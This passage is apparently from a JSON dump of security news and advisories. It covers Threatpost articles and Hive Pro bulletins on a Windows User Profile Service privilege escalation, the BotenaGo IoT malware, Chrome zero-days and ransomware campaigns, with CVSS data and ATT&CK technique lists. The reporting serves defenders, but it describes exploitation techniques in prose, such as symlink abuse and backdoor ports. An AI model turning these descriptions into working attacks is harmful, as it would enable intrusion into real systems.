creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0Patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) . 
\u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (essentially, a shortcut link that points to a specific file or folder), then would need to save it in the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from user\u2019s original profile folder as described by Kolsek, the symbolic link will force it to create a folder containing a malicious library (DLL) payload somewhere else where the attacker would normally not have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. 
\u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path by calling the \u201cGetFinalPathNameByHandle\u201d function.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts) since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Abdelhamid said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. 
Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>)\u2014a language Google first published in 2007\u2013works by creating a backdoor to the device. 
It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder in which to load shell scripts files. 
If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\n[](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/?utm_source=Specops+&utm_medium=web&utm_campaign=event&utm_id=Specops+&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nOnce it establishes that a device is vulnerable to attack, BotenaGo proceeds with exploit delivery by first querying the target with a simple \u201cGET\u201d request. It then searches the returned data from the \u201cGET\u201d request with each system signature that was mapped to attack functions.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices that are vulnerable to this type of attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. 
One is the create backdoor ports\u201331421 and 19412\u2014that are used in an attack scenario, Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by setting a listener to system IO (terminal) user input, getting the command to the device that way, Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttackers that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which that can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? 
Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at **_[**becky.bracken@threatpost.com**](<mailto:becky.bracken@threatpost.com>)_**.**_\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-07-05T11:54:40", "description": "While 
people were celebrating the Fourth of July holiday in the United States, Google quietly rolled out a stable channel update for Chrome to patch an actively exploited zero-day vulnerability, the fourth such flaw the vendor has had to patch in its browser product so far this year.\n\nChrome 103 (103.0.5060.71) for Android and Version 103.0.5060.114 for Windows and Mac, outlined in [separate ](<https://chromereleases.googleblog.com/>)[blog posts](<https://chromereleases.googleblog.com/2022/07/extended-stable-channel-update-for.html>) published Monday, fix a heap buffer overflow flaw in WebRTC, the engine that gives the browser its real-time communications capability.\n\nThe vulnerability, tracked as [CVE-2022-2294](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2294>) and reported by Jan Vojtesek from the Avast Threat Intelligence team on July 1**, **is described as a buffer overflow, \u201cwhere the buffer that can be overwritten is allocated in the heap portion of memory,\u201d according to the vulnerability\u2019s [listing](<https://cwe.mitre.org/data/definitions/122.html>) on the Common Weakness Enumeration (CWE) website.\n\nAs per usual, Google did not reveal specific details about the bug, as it generally waits until most have updated to the patched version of the affected product. Indeed, updating is strongly recommended, as exploits for the vulnerability already exist in the wild, Google said.\n\nMoreover, with scant details revealed about the flaw\u2014a habit of Google\u2019s that many security researchers find frustrating\u2014at this point an update is really only way to defend against attacks exploiting the flaw. Fortunately, Google Chrome updates are pushed out without user intervention, so most users will be protected once patches are available.\n\nBuffer overflows generally lead to crashes or other attacks that make the affected program unavailable including putting the program into an infinite loop, according to the CWE listing. 
Attackers can take advantage of the situation by using the crash to execute arbitrary code typically outside of the scope of the program\u2019s security policy.\n\n\u201cBesides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker\u2019s code,\u201d according to the listing. \u201cEven in applications that do not explicitly use function pointers, the run-time will usually leave many in memory.\u201d\n\n## **Other Fixes**\n\nIn addition to fixing the zero-day buffer overflow flaw, the Chrome releases also patch a type confusion flaw in the V8 JavaScript engine tracked as [CVE-2022-2295](<https://security-tracker.debian.org/tracker/CVE-2022-2295>) and reported June 16 by researchers \u201cavaue\u201d and \u201cBuff3tts\u201d at S.S.L., according to the post.\n\nThis is the third such flaw in the open-source engine used by Chrome and Chromium-based web browsers patched this year alone. In March a separate type-confusion issue in the V8 JavaScript engine tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1096>) and under active attack [spurred a hasty patch](<https://threatpost.com/google-chrome-bug-actively-exploited-zero-day/179161/>) from Google.\n\nThen in April, the company patched [CVE-2022-1364](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1364>), another type confusion flaw affecting Chrome\u2019s use of V8 on which attackers already had pounced.\n\nAnother flaw patched in Monday\u2019s Chrome update is a use-after-free flaw in Chrome OS Shell reported by Khalil Zhani on May 19 and tracked as [CVE-2022-2296](<https://cve.report/CVE-2022-2296>), according to Google. All of the flaws patched in this week\u2019s update received a rating of high. 
The updates also includes several fixes from internal audits, fuzzing and other initiatives, Google said.\n\nPrior to patching the Chrome V8 JavaScript engine flaws in March and April, Google in February already had patched a zero-day use-after-free flaw in Chrome\u2019s Animation component tracked as [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>) that [was under active attack](<https://threatpost.com/google-chrome-zero-day-under-attack/178428/>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T11:54:21", "type": "threatpost", "title": "Google Patches Actively Exploited Chrome Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2296"], "modified": "2022-07-05T11:54:21", "id": "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "href": "https://threatpost.com/actively-exploited-chrome-bug/180118/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-04-22T17:42:03", "description": "THREAT LEVEL: Red. 
For a detailed advisory, download the pdf file here Microsoft addressed 128 vulnerabilities in there April patch Tuesday update. Two of them have been categorized as zero-day vulnerabilities. One of the two zero-days is exploited-in-the-wild as well. The vulnerability, CVE-2022-24521, has been exploited in the wild. By exploiting this flaw in the Windows Common Log File System (CLFS) driver, an attacker can escalate privileges. The second zero-day is CVE-2022-26904, which is discovered in the Windows User Profile Service also permits the escalation of privileges. Despite being listed as more likely to be exploited, it has a high attack complexity, and successful exploitation requires an attacker to win a race condition. Organizations have advised the patch all these vulnerabilities as soon as possible to avoid exploitation. Potential MITRE ATT&CK TTPs are: TA0042: Resource Development T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities TA0001: Initial Access T1190: Exploit Public-Facing Application TA0004: Privilege Escalation T1068: Exploitation for Privilege Escalation Vulnerability Detail Patch Links https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 References https://www.cisa.gov/uscert/ncas/current-activity/2022/04/12/microsoft-releases-april-2022-security-updates", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T05:08:02", "type": "hivepro", "title": "Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities", "bulletinFamily": "info", "cvss2": 
{"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-26904"], "modified": "2022-04-14T05:08:02", "id": "HIVEPRO:F62D9BF485959B812585A48122216FD7", "href": "https://www.hivepro.com/microsoft-patch-tuesday-april-2022-addressed-two-zero-day-vulnerabilities/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-11T15:49:25", "description": "Threat Level Attack Report For a detailed advisory, download the pdf file here Summary The threat actors behind the Cuba ransomware have stepped up their game by using a new Remote Access Trojan called ROMCOM and weaponizing a local privilege escalation vulnerability(CVE-2022-24521). 
A wide range of industries was targeted, including professional and legal services and state and local government.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T12:34:37", "type": "hivepro", "title": "Zero-day vulnerability leveraged to deploy Cuba Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521"], "modified": "2022-08-11T12:34:37", "id": "HIVEPRO:AB4C2A84604B0434A37D2695927D9A64", "href": "https://www.hivepro.com/zero-day-vulnerability-leveraged-to-deploy-cuba-ransomware/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-25T14:28:59", "description": "THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here After seven months, a vulnerability that was addressed in August 2021 patch Tuesday remained unpatched. This locally exploited vulnerability is tracked as CVE-2021-34484 and affects the Windows User Profile Service. While Proof-of-concept is been available for some time now, it is not been actively exploited in the wild. 
This Elevation of Privilege vulnerability was found by renowned researcher Abdelhamid Naceri and reported to Microsoft, which addressed it in their August 2021 release. Naceri noted that Microsoft's fix was incomplete soon after it was issued and presented a proof of concept (POC) that bypassed it on all Windows versions. That is when the 0patch team, published an unofficial security update for all Windows versions and made it available for free download to all registered users. Microsoft then patched this security flaw in their January 2022 release, tracking it as CVE-2022-21919. Naceri, on the other hand, discovered a way around this second patch. However, Microsoft's second attempt to fix the bug altered the "profext.dll" file, resulting in the removal of the unofficial workaround of 0patch from everyone who had installed the January 2022 Windows updates. Organizations could apply the 0patch unofficial patch to patch this vulnerability using the steps given below: 1. Update Windows 10 to the latest March 2022 patch.2. Create a free account in 0patch Central3. Install and register the 0patch Agent4. An automated micro-patching process will initiate to apply this patch. 
Potential MITRE ATT&CK TTPs are: TA0042: Resource DevelopmentT1588: Obtain CapabilitiesT1588.006: Obtain Capabilities: VulnerabilitiesTA0001: Initial AccessT1190: Exploit Public-Facing ApplicationTA0004: Privilege EscalationT1068: Exploitation for Privilege EscalationTA0005: Defense Evasion T1548: Abuse Elevation Control Mechanism Vulnerability Details References https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21919 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484 https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/ https://blog.0patch.com/2022/03/a-bug-that-doesnt-want-to-die-cve-2021.html", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T13:56:19", "type": "hivepro", "title": "Microsoft\u2019s privilege escalation vulnerability that refuses to go away", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919"], "modified": "2022-03-25T13:56:19", "id": "HIVEPRO:98B56CB60C0C2B248824B5ECAE47E387", "href": 
"https://www.hivepro.com/microsofts-privilege-escalation-vulnerability-that-refuses-to-go-away/", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome's web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. 
Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31206 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855 CVE-2022-0543 https://security-tracker.debian.org/tracker/CVE-2022-0543 Active Actors: Icon Name Origin Motive APT 35 (Magic Hound, Cobalt Illusion, Charming Kitten, TEMP.Beanie, Timberworm, Tarh Andishan, TA453, ITG18, Phosphorus, Newscaster) Iran Information theft and espionage AvosLocker Unknown Ecrime, Information theft, and Financial gain Lazarus Group (Labyrinth Chollima, Group 77, Hastati Group, Whois Hacking Team, NewRomanic Cyber Army Team, Zinc, Hidden Cobra, Appleworm, APT-C-26, ATK 3, SectorA01, ITG03) North Korea Information theft and espionage, Sabotage and destruction, Financial crime Lapsus$ (DEV-0537) Unknown Data theft and Destruction DarkHotel (APT-C-06, SIG25, Dubnium, Fallout Team, Shadow Crane, CTG-1948, Tungsten Bridge, ATK 52, Higaisa, TAPT-02, Luder) South Korea Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration TA0040: Impact T1583: Acquire Infrastructure T1189: Drive-by Compromise T1059: Command and Scripting Interpreter T1098: Account Manipulation T1548: Abuse Elevation Control Mechanism T1548: Abuse 
Elevation Control Mechanism T1110: Brute Force T1010: Application Window Discovery T1021: Remote Services T1560: Archive Collected Data T1071: Application Layer Protocol T1048: Exfiltration Over Alternative Protocol T1485: Data Destruction T1583.001: Domains T1190: Exploit Public-Facing Application T1059.001: PowerShell T1547: Boot or Logon Autostart Execution T1134: Access Token Manipulation T1134: Access Token Manipulation T1110.003: Password Spraying T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1560.003: Archive via Custom Method T1071.001: Web Protocols T1048.003: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol T1486: Data Encrypted for Impact T1583.006: Web Services T1133: External Remote Services T1059.005: Visual Basic T1547.006: Kernel Modules and Extensions T1134.002: Create Process with Token T1134.002: Create Process with Token T1056: Input Capture T1120: Peripheral Device Discovery T1021.002: SMB/Windows Admin Shares T1560.002: Archive via Library T1132: Data Encoding T1041: Exfiltration Over C2 Channel T1491: Defacement T1587: Develop Capabilities T1566: Phishing T1059.004: Unix Shell T1547.001: Registry Run Keys / Startup Folder T1547: Boot or Logon Autostart Execution T1564: Hide Artifacts T1056.004: Credential API Hooking T1057: Process Discovery T1021.004: SSH T1213: Data from Information Repositories T1132.001: Standard Encoding T1537: Transfer Data to Cloud Account T1491.001: Internal Defacement T1587.001: Malware T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1547.009: Shortcut Modification T1547.006: Kernel Modules and Extensions T1564.001: Hidden Files and Directories T1056.001: Keylogging T1012: Query Registry T1005: Data from Local System T1001: Data Obfuscation T1561: Disk Wipe T1588: Obtain Capabilities T1199: Trusted Relationship T1203: Exploitation for Client Execution T1543: Create or Modify System Process T1547.001: Registry Run Keys / Startup Folder T1562: Impair Defenses 
T1003: OS Credential Dumping T1082: System Information Discovery T1074: Data Staged T1001.003: Protocol Impersonation T1561.001: Disk Content Wipe T1588.004: Digital Certificates T1078: Valid Accounts T1106: Native API T1543.003: Windows Service T1547.009: Shortcut Modification T1562.004: Disable or Modify System Firewall T1111: Two-Factor Authentication Interception T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1573: Encrypted Channel T1561.002: Disk Structure Wipe T1588.006: Vulnerabilities T1053: Scheduled Task/Job T1133: External Remote Services T1543: Create or Modify System Process T1562.001: Disable or Modify Tools T1552: Unsecured Credentials T1033: System Owner/User Discovery T1056: Input Capture T1573.001: Symmetric Cryptography T1490: Inhibit System Recovery T1204: User Execution T1137: Office Application Startup T1543.003: Windows Service T1070: Indicator Removal on Host T1124: System Time Discovery T1056.004: Credential API Hooking T1008: Fallback Channels T1489: Service Stop T1204.002: Malicious File T1542: Pre-OS Boot T1068: Exploitation for Privilege Escalation T1070.004: File Deletion T1056.001: Keylogging T1105: Ingress Tool Transfer T1529: System Shutdown/Reboot T1047: Windows Management Instrumentation T1542.003: Bootkit T1055: Process Injection T1070.006: Timestomp T1571: Non-Standard Port T1053: Scheduled Task/Job T1055.001: Dynamic-link Library Injection T1036: Masquerading T1090: Proxy T1505: Server Software Component T1053: Scheduled Task/Job T1036.005: Match Legitimate Name or Location T1090.002: External Proxy T1505.003: Web Shell T1078: Valid Accounts T1027: Obfuscated Files or Information T1078: Valid Accounts T1027.006: HTML Smuggling T1027.002: Software Packing T1542: Pre-OS Boot T1542.003: Bootkit T1055: Process Injection T1055.001: Dynamic-link Library Injection T1218: Signed Binary Proxy Execution T1218.001: Compiled HTML File T1078: Valid Accounts T1497: Virtualization/Sandbox Evasion Threat 
